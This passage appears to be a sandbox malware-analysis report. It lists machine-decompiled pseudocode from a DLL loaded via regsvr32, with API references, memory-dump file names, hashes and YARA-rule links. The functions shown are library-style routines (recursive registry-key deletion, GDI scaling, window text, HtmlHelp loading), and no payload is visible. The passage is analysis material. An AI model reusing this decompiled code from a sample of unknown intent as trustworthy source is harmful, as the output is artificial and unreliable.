                                                                                                            0x10014494
                                                                                                            0x10014494
                                                                                                            0x10014497
                                                                                                            0x1001449d
                                                                                                            0x1001449f
                                                                                                            0x100144a4
                                                                                                            0x100144a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100144fd
                                                                                                            0x10014503
                                                                                                            0x10014506
                                                                                                            0x1001450b
                                                                                                            0x1001450b
                                                                                                            0x1001450b
                                                                                                            0x1001450f
                                                                                                            0x1001450f
                                                                                                            0x10014512
                                                                                                            0x10014515
                                                                                                            0x1001451a
                                                                                                            0x1001451f
                                                                                                            0x10014522
                                                                                                            0x10014525
                                                                                                            0x10014528
                                                                                                            0x10014404
                                                                                                            0x10014406
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100143f0
                                                                                                            0x10014558
                                                                                                            0x1001455d

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 100143D0
                                                                                                            • SendMessageA.USER32(?,00000138,?,?), ref: 10014448
                                                                                                            • GetBkColor.GDI32(?), ref: 10014451
                                                                                                            • GetTextColor.GDI32(?), ref: 1001445D
                                                                                                            • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 100144EF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 187318432-0
                                                                                                            • Opcode ID: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
                                                                                                            • Instruction ID: aaf9ea3742fe6bc6e7247e3e7f83f19f993380783e2d83981db4afd0f75aeedd
                                                                                                            • Opcode Fuzzy Hash: 6309156ecb13da3d4968e683f2a6bd285be12691599974598d928356da355451
                                                                                                            • Instruction Fuzzy Hash: 1541457450074ADFCB20CF64C884A9EB3B0FF08310B128919F89A9F2B2DB74E890DB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100071AD Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E100071AD(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x10045580; // 0x8f64cb61
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E1001FBF7(E1003305F, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						_push(_t59);
						E1000563B(_t42, _t59 - 0x14, _t54, _t57, _t66);
						 *(_t59 - 4) = 1;
						_t57 = E100071AD(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10001260( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E1001FBB5(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}
















                                                                                                            0x100071ad
                                                                                                            0x100071b4
                                                                                                            0x100071b8
                                                                                                            0x100071bf
                                                                                                            0x100071c5
                                                                                                            0x100071cc
                                                                                                            0x100071d1
                                                                                                            0x100071d9
                                                                                                            0x100071df
                                                                                                            0x100071e5
                                                                                                            0x100071e8
                                                                                                            0x100071eb
                                                                                                            0x100071f1
                                                                                                            0x100071f5
                                                                                                            0x100071fb
                                                                                                            0x10007209
                                                                                                            0x1000720f
                                                                                                            0x10007211
                                                                                                            0x10007213
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10007215
                                                                                                            0x1000721b
                                                                                                            0x1000721f
                                                                                                            0x1000722b
                                                                                                            0x10007237
                                                                                                            0x1000723b
                                                                                                            0x10007241
                                                                                                            0x10007245
                                                                                                            0x1000724c
                                                                                                            0x1000724e
                                                                                                            0x00000000
                                                                                                            0x1000724e
                                                                                                            0x00000000
                                                                                                            0x1000724c
                                                                                                            0x1000726f
                                                                                                            0x10007275
                                                                                                            0x1000727f
                                                                                                            0x1000728a
                                                                                                            0x10007277
                                                                                                            0x10007277
                                                                                                            0x1000727d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000727d
                                                                                                            0x1000728f
                                                                                                            0x1000728f
                                                                                                            0x1000729a
                                                                                                            0x100072a2
                                                                                                            0x100072a3
                                                                                                            0x100072a4
                                                                                                            0x100072ad
                                                                                                            0x100072b2
                                                                                                            0x100072b9

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100071CC
                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 100071EB
                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10007209
                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 10007284
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1000728F
                                                                                                              • Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 301487041-0
                                                                                                            • Opcode ID: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
                                                                                                            • Instruction ID: 857dbc2a6ce260c152275e15a4f46308dc9617d79fc9f0d391124e600494f057
                                                                                                            • Opcode Fuzzy Hash: 30927a9a5a5225e6a5d87cb90a9f359c3c04349a4499108c5426f94dc879b8ba
                                                                                                            • Instruction Fuzzy Hash: 2A21D075D0425A9FEB25DB64CD41AEEB7B0FF08390F10422AED55AB290DB345E44DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001BA34 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1001BA34(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FE50(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x1001ba37
                                                                                                            0x1001ba3a
                                                                                                            0x1001ba3f
                                                                                                            0x1001ba8b
                                                                                                            0x1001ba91
                                                                                                            0x00000000
                                                                                                            0x1001ba41
                                                                                                            0x1001ba4a
                                                                                                            0x1001ba4f
                                                                                                            0x1001ba85
                                                                                                            0x1001ba87
                                                                                                            0x1001ba96
                                                                                                            0x1001ba96
                                                                                                            0x1001baa8
                                                                                                            0x1001bab0
                                                                                                            0x1001bab6
                                                                                                            0x1001bab8
                                                                                                            0x1001ba56
                                                                                                            0x1001ba58
                                                                                                            0x1001ba5c
                                                                                                            0x1001ba64
                                                                                                            0x1001ba6b
                                                                                                            0x1001ba6e
                                                                                                            0x1001ba6e
                                                                                                            0x1001ba4f
                                                                                                            0x1001babf

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,?,?,?,?,?,10015D46,?,00000000,0000001C,100166B4,?,?,?,?,?), ref: 1001BA44
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1001BA7E
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1001BA87
                                                                                                              • Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE90
                                                                                                              • Part of subcall function 1000FE50: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FEAD
                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000060), ref: 1001BAAB
                                                                                                            • MulDiv.KERNEL32(00000000,000009EC,?), ref: 1001BAB6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
                                                                                                            • Instruction ID: 22d9993a61e9b7a788ac8545e9176f77a0c9c7fd087465b0058942df5384f877
                                                                                                            • Opcode Fuzzy Hash: 5840f87b3609487458aaab7b763707c6ac1ff970de9859fc770cd0648c671529
                                                                                                            • Instruction Fuzzy Hash: D411E131600A14EFDB22AF55CC85D0EBBE9EF89750B124419FA829B361CB72ED41DF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001BAC2 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1001BAC2(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x10048630; // 0x60
					_t12 =  *0x10048634; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000FDE7(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                            0x1001bac5
                                                                                                            0x1001bac8
                                                                                                            0x1001bacd
                                                                                                            0x1001bb19
                                                                                                            0x1001bb1f
                                                                                                            0x00000000
                                                                                                            0x1001bacf
                                                                                                            0x1001bad8
                                                                                                            0x1001badd
                                                                                                            0x1001bb13
                                                                                                            0x1001bb15
                                                                                                            0x1001bb24
                                                                                                            0x1001bb24
                                                                                                            0x1001bb36
                                                                                                            0x1001bb3f
                                                                                                            0x1001bb44
                                                                                                            0x1001bb46
                                                                                                            0x1001bae4
                                                                                                            0x1001bae6
                                                                                                            0x1001baea
                                                                                                            0x1001baf2
                                                                                                            0x1001baf9
                                                                                                            0x1001bafc
                                                                                                            0x1001bafc
                                                                                                            0x1001badd
                                                                                                            0x1001bb4d

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,00000000,?,?,?,?,10015D8A,?,?,?,?,?,?), ref: 1001BAD2
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 1001BB0C
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 1001BB15
                                                                                                              • Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE27
                                                                                                              • Part of subcall function 1000FDE7: MulDiv.KERNEL32(?,00000000,00000000), ref: 1000FE44
                                                                                                            • MulDiv.KERNEL32(?,00000060,000009EC), ref: 1001BB39
                                                                                                            • MulDiv.KERNEL32(00000000,?,000009EC), ref: 1001BB44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
                                                                                                            • Instruction ID: 64b43f4f01bdcb0d49ba4a6e9a36d092bff00c01b953ac3af172aaf16eee57d7
                                                                                                            • Opcode Fuzzy Hash: 52b1341bc56cc0c3782e191dcf6f63c187834ad54c4c27d76bd8348fdb9a1aa1
                                                                                                            • Instruction Fuzzy Hash: CF11AC35600A14AFEB22AF56CC85C1EBBF9EF89750B124419FA829B761C771ED41CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011005 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10011005(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				void* _t26;
				int _t27;
				CHAR* _t28;
				signed int _t29;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x10045580; // 0x8f64cb61
				_v8 = _t9 ^ _t29;
				_t21 = _a4;
				_t32 = _t21;
				_t28 = _a8;
				if(_t21 == 0) {
					L1:
					E10004E6E(_t21, _t22, _t26, _t28, _t32);
				}
				if(_t28 == 0) {
					goto L1;
				}
				_t27 = lstrlenA(_t28);
				_v264 = 0;
				E10020F40(_t27,  &_v263, 0, 0xff);
				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
					_t16 = SetWindowTextA(_t21, _t28);
				}
				return E1001FBB5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}


















                                                                                                            0x10011005
                                                                                                            0x10011005
                                                                                                            0x1001100e
                                                                                                            0x10011015
                                                                                                            0x10011019
                                                                                                            0x1001101c
                                                                                                            0x1001101f
                                                                                                            0x10011023
                                                                                                            0x10011025
                                                                                                            0x10011025
                                                                                                            0x10011025
                                                                                                            0x1001102c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001103a
                                                                                                            0x10011045
                                                                                                            0x1001104c
                                                                                                            0x1001105b
                                                                                                            0x10011084
                                                                                                            0x10011084
                                                                                                            0x10011098

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 1001102F
                                                                                                            • _memset.LIBCMT ref: 1001104C
                                                                                                            • GetWindowTextA.USER32 ref: 10011066
                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 10011078
                                                                                                            • SetWindowTextA.USER32(?,?), ref: 10011084
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4273134663-0
                                                                                                            • Opcode ID: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
                                                                                                            • Instruction ID: 10167af52a95b6190f72f3b34ec66ed1a7e9255054ff2824fd61587a0385250f
                                                                                                            • Opcode Fuzzy Hash: 4c9b521e76057fc99441da0c168c3e684543e59944e4fe8cf20e588bc23182cd
                                                                                                            • Instruction Fuzzy Hash: 22018476A01268ABE712DB64CCC4BDF77ACEB59780F014065F946DB142EAB1DEC48760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10008551 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E10008551(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E100083A5() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E1002291E(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x100482f0(_a4, _a8);
			}








                                                                                                            0x1000855e
                                                                                                            0x10008577
                                                                                                            0x100085e2
                                                                                                            0x100085e2
                                                                                                            0x100085e4
                                                                                                            0x00000000
                                                                                                            0x100085e5
                                                                                                            0x10008579
                                                                                                            0x10008580
                                                                                                            0x00000000
                                                                                                            0x10008599
                                                                                                            0x1000859a
                                                                                                            0x1000859d
                                                                                                            0x100085ab
                                                                                                            0x100085ae
                                                                                                            0x100085b6
                                                                                                            0x100085b7
                                                                                                            0x100085b8
                                                                                                            0x100085b9
                                                                                                            0x100085c0
                                                                                                            0x100085c3
                                                                                                            0x100085c7
                                                                                                            0x100085d6
                                                                                                            0x100085db
                                                                                                            0x100085de
                                                                                                            0x00000000
                                                                                                            0x100085de
                                                                                                            0x10008580
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 1000858F
                                                                                                            • GetSystemMetrics.USER32 ref: 100085A7
                                                                                                            • GetSystemMetrics.USER32 ref: 100085AE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: System$Metrics$InfoParameters
                                                                                                            • String ID: DISPLAY
                                                                                                            • API String ID: 3136151823-865373369
                                                                                                            • Opcode ID: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
                                                                                                            • Instruction ID: ce2e2f080287dd97aac08b6d54948a152684e982f167b1d142294c492be0e5a9
                                                                                                            • Opcode Fuzzy Hash: 3e672ade7eb21542bf4ad099db13503eb2e79d1d00444ef13faf9d4c700962cf
                                                                                                            • Instruction Fuzzy Hash: 9B119471901624ABEB56DF648C8465B7BA9FF05781F118052FD45AE04AD271DB00CBE0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000BA02 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E1000BA02(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10011382(__ebx, _t25, __ebp, 0xc);
				_push(E1000AEB0);
				_t26 = E10010657(__ebx, 0x10048470, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E10004E6E(_t21, 0x10048470, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E100113EF(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E100094FA(_t21, 0x10048470, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}











                                                                                                            0x1000ba02
                                                                                                            0x1000ba02
                                                                                                            0x1000ba02
                                                                                                            0x1000ba05
                                                                                                            0x1000ba0a
                                                                                                            0x1000ba19
                                                                                                            0x1000ba1b
                                                                                                            0x1000ba1d
                                                                                                            0x1000ba1f
                                                                                                            0x1000ba1f
                                                                                                            0x1000ba24
                                                                                                            0x1000ba28
                                                                                                            0x1000ba62
                                                                                                            0x1000ba64
                                                                                                            0x00000000
                                                                                                            0x1000ba2a
                                                                                                            0x1000ba2a
